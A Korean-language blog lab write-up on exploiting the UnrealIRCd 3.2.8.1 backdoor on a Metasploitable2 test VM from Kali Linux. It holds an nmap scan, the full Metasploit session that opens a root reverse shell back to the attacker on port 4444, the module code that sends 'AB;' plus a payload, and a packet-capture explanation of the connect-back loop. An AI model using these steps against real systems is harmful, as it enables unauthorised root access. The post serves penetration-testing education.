- 사용 시스템
KaliLinux
Metasploitable V2 Linux
- UrealIRCd
UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.
> IRC는 채팅 서버이다. ( 많은 해커그룹들이 정보를 나누는 데에 사용한다. )
- 버그
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
exploit/unix/irc/unreal_ircd_3281_backdoor
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
> 2009년 11월 에서 2010년 6월 12일 사이에 배포된 Unreal3.2.8.1.tar.gz 에서 나타나는 버그이다.
> AB 문자를 보내면 실행되는 것 같다.
- 실습
(kali)
1. 데몬 확인
# nmap -sV 192.168.17.134
|
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-15 17:45 KST Nmap scan report for 192.168.17.134 Host is up (0.000083s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.91 seconds |
|
2. wireshark 로 패킷 확인
# wireshark &
3. msfconsole 공격
# msfconsole
|
msf > search unreal_ircd Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.17.134 RHOST => 192.168.17.134 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse TCP double handler on 192.168.17.50:4444 [*] 192.168.17.134:6667 - Connected to 192.168.17.134:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] 192.168.17.134:6667 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo XkAcueQy9P2Z8MTs; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "XkAcueQy9P2Z8MTs\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.17.50:4444 -> 192.168.17.134:59676) at 2017-11-15 17:53:43 +0900 id uid=0(root) gid=0(root) hostname metasploitable ^C Abort session 1? [y/N] y [*] 192.168.17.134 - Command shell session 1 closed. Reason: User exit msf exploit(unreal_ircd_3281_backdoor) > edit print_line(" #{line}") end print_status("Sending backdoor command...") sock.put("AB;" + payload.encoded + "\n") # Wait for the request to be handled 1.upto(120) do break if session_created? select(nil, nil, nil, 0.25) handler() end disconnect |
|
> root 권한을 가졌다.
> edit으로 확인해보니 AB와 payload 코드를 보내는 것을 확인했다.
4. wireshark 확인
> irc 패킷만 보면 Kali에서 134 서버로 AB; sh 라는 것을 Request 보낸 것을 확인 할 수 있다.
> Follow > TCP Stream 을 통해 주고받은 내용을 확인 해보면
> AB: sh -c '( .... ) 가 전달 되었다.
sh -c 는 다음을 쉘로 실행하라는 의미이다. 괄호 안의 내용은 칼리서버의 4444포트의 접속을 계속해서 연결하는 무한루프 코드를 확인 할 수 있다.
'Security > 정보 수집' 카테고리의 다른 글
| UFOnet ( DDoS 공격 테스트, 좀비 PC ) (0) | 2017.12.26 |
|---|---|
| Metasploitable V2 Linux 취약성 ( samba ) (0) | 2017.11.15 |
| Metasploitable V2 Linux 취약성 ( VSFTPD backdoor ) (0) | 2017.11.14 |
| Metasploitable V2 Linux 취약점 ( NFS 전체 공유 ) (0) | 2017.11.14 |
| Metasploitable V2 Linux 서버의 취약점 ( rCMD ) (0) | 2017.11.14 |
